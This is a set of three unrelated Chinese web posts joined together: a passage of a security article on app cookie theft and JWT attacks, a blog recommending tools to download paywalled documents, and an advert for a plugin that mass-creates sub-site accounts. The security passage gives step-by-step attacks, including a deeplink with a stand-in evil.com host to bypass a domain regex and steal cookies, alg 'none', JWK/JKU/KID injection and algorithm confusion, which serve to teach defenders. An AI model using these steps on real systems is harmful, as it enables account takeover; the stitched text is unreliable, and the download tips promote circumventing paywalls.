危害性:高 普遍性:低 可利用性:中 比较常见的是因为WEB漏洞导致COOKIE被盗取,但是如果APP中存在漏洞也是可能导致COOKIE被盗取的。 如下案例,首先通过分析JS发现一个可以通过DEEPLINK唤醒APP在WEBVIEW中打开任意URL的漏洞: app://open/?url=http://www.evil.com 在APP中,会用到JsBridge让WebView和Native进行交互,尝试在APP中打开我自己构造的页面,调用Native方法,发现调用失败,猜测是APP中有一定的检测逻辑,导致调用失败,对APP进行逆向分析看是否能够绕过检测。 通过逆向定位到是这里对打开的URL使用了正则进行检测: (^|:\/\/)((((\w|-|\.)+\.)(asdqwe\.(cn|com))))($|[\/\?#]\w* 通过分析发现该正则是可以绕过的,问题出在开头的正则: (^|:\/\/) 那么只要让打开的URL包含如下字符串就能绕过正则的检测: ://aaa.asdqwe.com 也就是如下构造DEEPLINK即可在我的页面中通过JsBridge调用Native方法: app://open/?url=http://www.evil.com/://aaa.asdqwe.com 最后发现调用某个Native方法发起HTTP请求任何域名的URL时,都会带上当前用户的COOKIE,最后利用这个Native方法可以实现盗取COOKIE。 JWT JWT一共分为三段: Header(头部) Payload(负载) Signature(签名) 其中Signature部分是对前两部分的签名,防止数据篡改,按照Header中指定的算法和服务器才知道的密钥来生成。 38. 弱密钥 // 危害性:高 普遍性:中 可利用性:高 JWT的密钥和账号密码一样存在弱密钥的问题,如果密钥非常简单,比如123456,那么攻击者可以非常轻易地生成其他用户的JWT,拿到账户权限。 39. 密钥泄露 // 危害性:高 普遍性:低 可利用性:高 密钥可能通过会代码仓库、报错页面等途径泄漏。 代码仓库泄漏: 报错信息中泄露: 40. 未校验签名 // 危害性:高 普遍性:低 可利用性:高 JWT库通常会提供验证和解码的方法,但是可能开发人员混淆了,只使用了解码方法,没有对签名进行验证,导致可以随意更改JWT来冒充其他用户。 例如,用账户访问/admin api时,返回401,提示该接口只能是administrator访问。 将当前的JWT进行解码,发现在PAYLOAD部分的sub字段存放了用户名。 将用户名更改为administrator,重新生成JWT,不用管签名或者签名部分直接删除,再次访问发现就不会再提示权限不足,成功冒充admin的身份。 41. 空加密算法 // 危害性:高 普遍性:低 可利用性:高 JWT可以使用不同的算法进行签名,但也可以不签名,在这种情况下,alg参数的值会为none,代表所谓的“不安全的JWT”。 还是在访问/admin api时,提示只允许administrator访问。 解码JWT,算法存储在HEADER中的alg字段,用户名存储在PAYLOAD的sub字段: 将alg改为none,sub改为administrator,重新生成不带签名的JWT再次访问: 可以看到成功伪造了administrator的身份,访问到了/admin api。 JWT HEADER中除了alg是必填的,还有一些可选的参数,是可能被攻击者利用的。 --JWK (JSON Web Key) - 存放JWT密钥的一个JSON --JKU (JSON Web Key Set URL) - 提供一个URL,服务器从中获取一组正确的密钥 --KID (Key ID) - JWK的ID 42. JWK参数注入 // 危害性:高 普遍性:低 可利用性:高 正常情况下,服务器应该只使用有限的公钥白名单来验证JWT签名,但是配置错误的服务器可能会使用JWK中的公钥来验证JWT的签名。 如下是包含JWK例子: 攻击者可利用这种配置错误,自己生成RSA私钥对修改后的JWT进行签名,然后将对应的公钥写入JWK中,以达到伪造其他用户身份的目的。 例如在访问/admin api时,提示只允许administrator访问。 首先将sub更改为administrator。 再根据自己生成的RSA密钥,使用私钥进行签名,把公钥放到JWK中,生成新的JWT。 再次访问/admin api,访问成功,代表伪造administrator身份成功。 43. JKU参数注入 // 危害性:高 普遍性:低 可利用性:高 某些服务器不会直接使用header参数中的JWK提交的公钥,会使用JKU提供包含密钥的JWK集合,服务器会请求JKU提供的URL获取密钥来验证签名。 JWK集合是一个JSON,如下: 如果服务器没有校验JKU的地址,攻击者可以将其改为自己构造的URL,让服务器使用自己生成的密钥来验证签名,以达到伪造其他用户身份的目的。 还是一样,在访问/admin api时,提示只允许administrator访问。 自己生成RSA密钥,构造一个api用于返回JWK集合。 修改KID与api中的一致,sub修改为administrator,并添加JKU参数指向自己构造的api,重新生成JWT。 再次访问/admin api,访问成功,代表伪造administrator身份成功。 44. KID参数注入 // 危害性:高 普遍性:低 可利用性:高 服务器可以使用多个加密密钥来给不同类型的数据进行签名,不只是JWT。所以KID参数用于帮助服务器在验证签名时使用正确的密钥。密钥通常以JWK集合的方式存储,但是规范中没有定义ID的具体结构,只是开发人员自己生成的一个字符串。例如,开发人员可能使用KID参数来指向数据库中的某条数据,甚至是文件的名称。 如果KID指向的是文件的名称,又存在目录遍历的漏洞,则攻击者可能会让服务器使用其文件系统中的任意文件作为验证的密钥。 如果服务器支持使用对称加密算法签名的JWT,攻击者可以让服务器使用/dev/null文件作为验证的密钥,绝大部分linux系统都有这个文件,因为这是一个空文件,服务器读取该文件时会获得null,再使用Base64编码空字节(AA==)生成一个有效的签名,达到伪造用户身份的目的。 还是和前面一样,在访问/admin api时,提示只允许administrator访问。 生成密钥为空字节的对称加密密钥: 修改sub为administrator,再使用目录遍历,将KID参数指向/dev/null文件,以让服务器获得密钥为null,最后重新签名生成新的JWT。 再次访问/admin api,访问成功,代表伪造administrator身份成功。 45. 算法混淆 // 危害性:高 普遍性:低 可利用性:中 某些JWT库在验证签名有效性时,给HMAC对称加密的密钥和RSA非对称加密的公钥赋予了相同的变量名,伪代码如下所示: 如果攻击者通过某种方式获得了RSA的公钥,攻击者可通过将JWT签名的算法从RS256调整为HS256,并用公钥对其进行签名,达到伪造用户身份的目的。 网络安全风险层出不穷,账号就像一把可以开启企业数据资产大门的“钥匙”,任何一点疏忽都可能对企业整体业务和数据资产造成严重的安全风险。因此,完善和维护账号安全体系是企业数字化信息安全建设的关键。
-
文库下载又不能用了?别急,还有一堆办法! 现在的文库下载工具真的是用一个少一个,毕竟许多软件作者的初衷只是为了方便大家,让大家能较为轻松的获取自己想要的文档。但是有些人喜欢拿到工具后,就开始了盈利行为,为软件本身招来了不好的影响。 收了钱就要提供对应的服务,有很多倒卖的人提供不了,然后用户来骂原作者的比比皆是,或者是喷软件不好用,可这本来就是软件作者用爱发电免费分享的,没有想过要赚钱,白白辛苦了一阵子还把名声搞臭了,估计没人会愿意继续更新下去吧。 之前推荐的界面还不错的YOCO下载器,就因为种种原因永久停止维护了,不少朋友也反馈软件用不了。 一、文库下载器 今天就给大家推荐另一款软件,并分享一些在Github上寻找下载工具的办法。 先来看看新的这款小工具,名字就是文库下载器,软件作者以前也发过一版,但是失效了,字体显示也有点问题,所以在16号又更新了一次,不再需要登录,下载几百页的文件也能Hold住,同时提高了下载速度。 软件就一个单文件,打开即用。把需要的链接丢进去就好了,没错,就是这么简单。 下载完成后,会在软件所在的目录下生成一个PDF文件,需要编辑的话,可以使用之前介绍的PDF24等工具转换一下格式。 下载地址: https://www.123pan.com/s/HQeA-cE4Sh https://ghpym.lanzouv.com/b0125x6ra 密码:97ai 二、上 GitHub 扒拉 有的朋友可能会问,这个工具失效了怎么办,还有没有其他能临时顶一下的工具?这时候就可以请出最大的"男生交友网站"-GitHub了,在上面搜索对应的关键字后,切换成Python语言之后,就可以找到前人留下来的一些上古工具。 点击下载将代码下载下来(地址:https://github.com/BoyInTheSun/wks)。 使用之前要做的是先配置一下运行Python的环境,当然你也不用听着就头大,配置环境现在也就是安装一个软件事情,在安装的时候把这个按钮勾选上即可。 安装好之后,进入到下载的代码文件里面,就可以看到py结尾的文件可以使用Python打开了,当然这里还需要下载一些依赖文件,在空白处按住Shift+鼠标右键,选择在此处打开powershell窗口。 输入 pip install -r requirements.txt 等待之后。 然后按照软件给出的帮助文档使用就行了,像是演示的这份代码也可以直接下载不要登录文件。 如果有其他文库的需求,也可以找到对应的分享,按照上面的步骤运行一下,就能使用了,像是这个叫做 多种文档下载器 的分享(地址:https://github.com/rty813/doc_downloader)。 也能下载许多文档,不过用别人分享的代码需要解决很多依赖的问题,缺少啥就装啥,像是示例这个就需要加一个:python.exe -m pip install fire。还有的是使用Chrome的ChromeDriver来控制抓取的,还有版本限制,配置起来比较糟心。 不过这种好处的方法就是,有人在GitHub分享比较新的办法的时候,可以第一时间用上,也不同太担心使用的人数太多而失效。不过一个项目火了之后还会有人打包分享的。 下载地址: 三、使用稻壳下载器 地址:http://www.daokeyuedu.com/ 除了上面那些,你还可以使用稻壳阅读器的打印PDF功能,来获取一些文档的下载。平常下载一点东西是够了。
-
-
【彩虹云商城插件】自动刷分站注册插件 把压缩包site.php上传到网站的根木录即可 使用方法:访问网址 : 域名/site.php?cronkey=你的监控密钥(必须填写)如果没有太多的需求,可以直接访问上面的访问网址就可以了。 其他参数 { num : 生成分站数量,不存在默认数量为5 power : [1 , 2] 1为普及版,2为专业版,如果值不在 1 , 2的范围内或者不存在这个参数,就会随机生成分站版本 user_suffix : 分站用户名前缀,如:值为 yunlan ,生成出来的用户名前面会加成 yunlan_随机用户名,可用于标识,不存在则为空, } 访问实例 : 域名/site.php?cronkey=123456&num=5&power=1&user_suffix=yunlan 具体生成出来的效果,自己看 ,我就不一一演示了本插件为全开源,插件闭源的几乎都是带后门,切记,切记,切记!隐藏内容,请前往内页查看详情
-
